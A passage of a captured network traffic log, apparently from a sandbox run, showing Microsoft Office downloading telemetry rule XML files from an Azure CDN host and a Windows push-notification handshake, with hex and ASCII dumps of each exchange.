                                                                                                                                                                              x-azure-ref: 20241121T073037Z-178bfbc474b9fdhphC1NYCac0n000000010000000000ey05
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:37 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              53192.168.2.64976613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:36 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:37 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 475
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                              ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                              x-ms-request-id: 76e95f1f-101e-0034-7059-3b96ff000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073037Z-178bfbc474bw8bwphC1NYC38b40000000130000000000bs7
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:37 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              54192.168.2.64976713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:36 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:37 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 448
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                              ETag: "0x8DC582BB389F49B"
                                                                                                                                                                              x-ms-request-id: 008bef3b-f01e-001f-677c-3b5dc8000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073037Z-1777c6cb754n67brhC1TEBcp9c0000000aqg00000000q0nx
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:37 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              55192.168.2.64976813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:37 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:37 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 491
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                              ETag: "0x8DC582B98B88612"
                                                                                                                                                                              x-ms-request-id: 5b8d3f05-a01e-006f-2465-3b13cd000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073037Z-178bfbc474bv7whqhC1NYC1fg40000000150000000007e81
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:37 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              56192.168.2.64976913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:38 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:38 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:38 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                              ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                              x-ms-request-id: f9d2b1a4-b01e-003d-337e-3bd32c000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073038Z-1777c6cb754mqztshC1TEB4mkc0000000asg00000000c6vs
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:38 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              57192.168.2.64977040.113.110.67443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:38 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 78 56 44 73 55 4f 6d 4c 71 55 79 4b 71 52 48 7a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 33 66 37 35 38 38 38 36 63 31 64 63 37 31 63 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: xVDsUOmLqUyKqRHz.1Context: 53f758886c1dc71c
                                                                                                                                                                              2024-11-21 07:30:38 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                              2024-11-21 07:30:38 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 78 56 44 73 55 4f 6d 4c 71 55 79 4b 71 52 48 7a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 33 66 37 35 38 38 38 36 63 31 64 63 37 31 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 36 6d 33 39 2f 70 35 62 71 4b 33 4e 2b 6b 31 2f 6d 71 42 62 4a 55 63 34 6f 4d 32 4f 38 72 56 46 47 67 45 31 57 59 51 58 7a 4d 45 54 45 53 4c 64 78 61 30 61 4c 51 6d 79 35 5a 69 39 4e 52 39 35 34 2b 5a 2b 58 6f 72 68 48 59 36 74 36 33 73 53 2f 72 67 50 68 58 36 6f 4a 79 2f 61 71 61 6d 50 43 5a 31 54 74 62 61 65 4f 5a 46 69
                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: xVDsUOmLqUyKqRHz.2Context: 53f758886c1dc71c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAR6m39/p5bqK3N+k1/mqBbJUc4oM2O8rVFGgE1WYQXzMETESLdxa0aLQmy5Zi9NR954+Z+XorhHY6t63sS/rgPhX6oJy/aqamPCZ1TtbaeOZFi
                                                                                                                                                                              2024-11-21 07:30:38 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 78 56 44 73 55 4f 6d 4c 71 55 79 4b 71 52 48 7a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 33 66 37 35 38 38 38 36 63 31 64 63 37 31 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: xVDsUOmLqUyKqRHz.3Context: 53f758886c1dc71c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                              2024-11-21 07:30:39 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                              2024-11-21 07:30:39 UTC58INData Raw: 4d 53 2d 43 56 3a 20 69 73 55 49 4e 50 5a 6a 41 55 79 68 6a 53 34 51 2b 37 2b 54 61 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                              Data Ascii: MS-CV: isUINPZjAUyhjS4Q+7+TaQ.0Payload parsing failed.


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              58192.168.2.64977113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:39 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:39 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 479
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                              ETag: "0x8DC582B989EE75B"
                                                                                                                                                                              x-ms-request-id: fcdc764c-f01e-0052-4963-3b9224000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073039Z-178bfbc474bpnd5vhC1NYC4vr4000000018g00000000010h
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:39 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              59192.168.2.64977313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:39 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:39 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:39 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                              ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                              x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073039Z-178bfbc474bp8mkvhC1NYCzqnn000000012g000000001mb7
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:39 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              60192.168.2.64977213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:39 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:39 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:39 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                              x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073039Z-1777c6cb7549x5qchC1TEBggbg0000000ay0000000000wfd
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:39 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              61192.168.2.64977413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:40 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:40 UTC491INHTTP/1.1 200 OK
